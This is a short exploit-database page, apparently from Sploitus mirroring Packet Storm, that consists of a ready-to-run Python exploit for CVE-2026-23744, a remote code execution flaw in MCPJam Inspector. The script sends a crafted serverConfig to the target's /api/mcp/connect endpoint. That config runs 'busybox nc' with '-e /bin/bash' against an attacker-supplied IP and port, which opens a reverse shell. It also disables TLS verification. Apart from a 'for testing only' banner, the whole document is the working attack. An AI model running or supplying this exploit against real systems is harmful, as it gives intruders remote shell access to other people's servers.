Share
## https://sploitus.com/exploit?id=PACKETSTORM:217697
#!/usr/bin/env python3
#################################
# #
# CVE-2026-23744.py #
# for testing only #
# #
#################################
import requests
import argparse
import json
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def main():
parser = argparse.ArgumentParser(description='MCPJam Inspector RCE (GHSA-232v-j27c-5pp6) - CVE-2026-23744')
parser.add_argument('--target', '-t', required=True, help='Target URL e.g. https://mcp.domain.com')
parser.add_argument('--att-ip', '-i', required=True, help='Attacker IP for revshell listener')
parser.add_argument('--att-port', '-p', required=True, help='Attacker port for revshell listener')
args = parser.parse_args()
url = f'{args.target}/api/mcp/connect'
data = {"serverConfig": {"command": "busybox", "args": ["nc", args.att_ip, args.att_port, "-e", "/bin/bash"], "env": {}}, "serverId": "mcp_test_server"}
print(f"\n{parser.description}\n")
print(f"[+] Sending revshell to {args.att_ip}:{args.att_port} via {url}")
print(f"[+] Payload: {json.dumps(data)}")
try:
response = requests.post(url, json=data, verify=False, timeout=10)
print(f"[+] Status: {response.status_code}")
print(f"[+] Response: {response.text}")
if response.status_code == 200:
print("[+] Check your listener!")
else:
print("[-] Exploit failed - check target/path")
except requests.exceptions.RequestException as e:
print(f"[-] Request failed: {e}")
print("[+] Check your listener, script did not detect response.")
sys.exit(1)
if __name__ == "__main__":
main()